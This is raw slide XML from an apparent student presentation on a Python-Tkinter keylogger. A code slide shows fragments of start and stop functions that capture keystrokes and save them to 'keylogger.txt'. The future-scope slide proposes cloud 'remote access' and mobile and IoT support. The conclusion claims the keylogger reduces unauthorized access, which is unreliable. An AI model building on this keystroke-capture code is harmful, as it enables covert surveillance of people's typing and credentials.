          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535560" y="1640880"/>
            <a:ext cx="5608080" cy="4753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en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t># Define the start_keylogger function</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def start_keylogger():</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    global listener</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    listener = keyboard.Listener(on_press=on_press, on_release=on_release)</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    listener.start()</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    label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</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    start_button.config(state='disabled')</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    stop_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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 Define the stop_keylogger function</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def stop_keylogger():</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    global listener</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    listener.stop()</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    label.config(text="Keylogger stopped.")</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    start_button</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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581040" y="702000"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="Content Placeholder 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384560" y="1719000"/>
            <a:ext cx="2990880" cy="3419640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">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581040" y="702000"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="146" name="Content Placeholder 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="904320" y="1692720"/>
            <a:ext cx="7487280" cy="752400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="147" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="720720" y="3458160"/>
            <a:ext cx="11250000" cy="1563120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">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581040" y="702000"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="670680" y="1447200"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="305280" indent="-305280" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>In conclusion, the creation of our advanced Python-Tkinter based keylogger marks a substantial stride in combating cybersecurity risks linked with keystroke logging. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="305280" indent="-305280" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>With its fortified security measures and intuitive interface, our keylogger stands poised to furnish users with a dependable and efficient tool for monitoring and safeguarding keyboard activity. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="305280" indent="-305280" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>By doing so, it effectively minimizes the likelihood of unauthorized access and privacy infringements, bolstering overall cybersecurity defenses.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>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p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="1620000"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="306000" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Integration with cloud-based storage solutions for secure data backup and remote access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Implementation of machine learning algorithms for anomaly detection and predictive analytics.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Collaboration with cybersecurity experts and industry stakeholders to continuously improve and adapt the keylogger's capabilities to evolving threats.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Expansion of platform support to include mobile devices and IoT (Internet of Things) devices.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Development of educational resources and training programs to raise awareness about cybersecurity risks and promote responsible usage of keylogger applications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Title 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535680" y="844560"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Future scope</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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581040" y="702000"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="1302120"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="305280" indent="-305280" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="0" u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/techtrainer20/TNSDC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="305280" indent="-305280" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1CADE4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>2.https://www.bing.com/ck/a?!&amp;&amp;p=1f4ad54fbd8b6758JmltdHM9MTcxMTg0MzIwMCZpZ3VpZD0wY2FkZjU2My03YjRjLTZiMTctMzU4Ny1lNmJmN2E5ZTZhOTcmaW5zaWQ9NTUyOA&amp;ptn=3&amp;ver=2&amp;hsh=3&amp;fclid=0cadf563-7b4c-6b17-3587-e6bf7a9e6a97&amp;psq=keyloggrs&amp;u=a1aHR0cHM6Ly93d3cuZ2Vla3Nmb3JnZWVrcy5vcmcvaW50cm9kdWN0aW9uLXRvLWtleWxvZ2dlcnMv&amp;ntb=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>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1463040" y="2766240"/>
            <a:ext cx="9298440" cy="1325160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="ctr" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>THANK YOU</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Boo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849600" y="558360"/>
            <a:ext cx="10515240" cy="1325160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>OUTLINE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586440" y="1618920"/>
            <a:ext cx="11018520" cy="5238720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
